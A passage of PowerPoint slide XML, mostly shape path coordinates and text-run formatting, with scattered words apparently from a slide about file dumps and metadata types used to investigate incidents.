                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688332" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731971" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4771173" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4804378" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4830026" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4846558" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4852415" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4852415" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4846558" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4830026" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4804378" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4771173" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731971" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688332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0442829" y="5555742"/>
            <a:ext cx="142875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10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Dump</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>files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53985" y="306451"/>
            <a:ext cx="174815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225">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Met</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="215">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data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38771" y="760476"/>
            <a:ext cx="2302764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06295" y="1882292"/>
            <a:ext cx="12037695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18155" marR="5080" indent="-3006090">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Metadata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refers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property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created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application,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media,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network.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types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metadata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investigate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incidents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include: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298947" y="3692652"/>
            <a:ext cx="5240020" cy="4006850"/>
            <a:chOff x="5298947" y="3692652"/>
            <a:chExt cx="5240020" cy="4006850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6192011" y="3892804"/>
              <a:ext cx="3500754" cy="3492500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3500754" h="3492500">
                  <a:moveTo>
                    <a:pt x="1988072" y="3479800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1512555" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559389" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941238" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1988072" y="3479800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3500754" h="3492500">
                  <a:moveTo>
                    <a:pt x="2171323" y="3441700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1329304" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466113" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034514" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171323" y="3441700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3500754" h="3492500">
                  <a:moveTo>
                    <a:pt x="2080548" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1420079" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374471" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110676" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068508" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026898" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985861" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945416" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905579" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866365" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827793" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789877" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752636" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716084" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680240" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645120" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610740" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577116" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544266" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512206" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480953" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450523" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420932" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392198" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364336" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337364" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311298" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286155" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261951" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238703" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216427" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195140" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174859" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155600" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137380" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120215" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104122" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89117" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75217" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62439" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50800" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40315" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31001" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22876" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15955" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10255" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5793" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2586" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2586" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5793" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10255" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15955" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22876" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31001" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40315" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50800" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62439" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75217" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89117" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104122" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120215" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137380" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155600" y="2476500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174859" y="2514600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195140" y="2552700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216427" y="2590800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238703" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261951" y="2667000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286155" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311298" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337364" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364336" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392198" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420932" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450523" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480953" y="2959100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512206" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544266" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577116" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610740" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645120" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="680240" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716084" y="3162300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752636" y="3187700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789877" y="3213100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827793" y="3238500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866365" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905579" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985861" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026898" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068508" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196620" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240362" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284596" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216031" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260265" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304007" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2432119" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473729" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514766" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575129" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654868" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607709" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560956" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514628" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468749" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246812" y="3200400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161918" y="3175000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120388" y="3149600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079499" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039270" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999725" y="3086100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960883" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922767" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885398" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848797" y="2997200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812985" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777985" y="2946400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743816" y="2908300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710502" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678062" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646519" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615894" y="2794000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586208" y="2755900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557483" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529739" y="2679700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502999" y="2654300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477283" y="2616200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452614" y="2578100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429012" y="2540000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406499" y="2501900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385096" y="2463800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364824" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345706" y="2374900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327761" y="2336800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311013" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295481" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281188" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268155" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256403" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245953" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236828" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229048" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222634" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217608" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213992" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211807" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211074" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211807" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213992" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217608" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222634" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229048" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236828" y="1473200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245953" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256403" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268155" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281188" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295481" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311013" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327761" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345706" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364824" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385096" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406499" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429012" y="965200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452614" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477283" y="889000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502999" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529739" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557483" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586208" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615894" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646519" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678062" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710502" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743816" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777985" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812985" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848797" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885398" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922767" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960883" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999725" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039270" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079499" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120388" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161918" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204066" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423338" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468749" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560956" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1702410" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1750314" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575129" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2555211" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514766" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2473729" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2432119" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2389951" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126156" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2080548" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3500754" h="3492500">
                  <a:moveTo>
                    <a:pt x="2575129" y="203200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1750314" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798217" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939671" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031878" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077289" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2296561" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338709" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380239" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421128" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2461357" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2500902" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2539744" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577860" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2615229" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2651830" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687642" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2722642" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756811" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790125" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822565" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854108" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2884733" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914419" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2943144" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2970888" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997628" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023344" y="889000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048013" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3071615" y="965200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094128" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115531" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3135803" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3154921" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3172866" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3189614" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3205146" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3219439" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3232472" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244224" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3254674" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3263799" y="1473200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271579" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3277993" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3283019" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286635" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288820" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3289554" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288820" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286635" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3283019" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3277993" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271579" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3263799" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3254674" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244224" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3232472" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3219439" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3205146" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3189614" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3172866" y="2336800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3154921" y="2374900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3135803" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115531" y="2463800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094128" y="2501900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3071615" y="2540000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048013" y="2578100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023344" y="2616200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997628" y="2654300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2970888" y="2679700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2943144" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914419" y="2755900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2884733" y="2794000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854108" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822565" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790125" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756811" y="2908300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2722642" y="2946400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687642" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2651830" y="2997200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2615229" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577860" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2539744" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2500902" y="3086100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2461357" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421128" y="3136900"/>
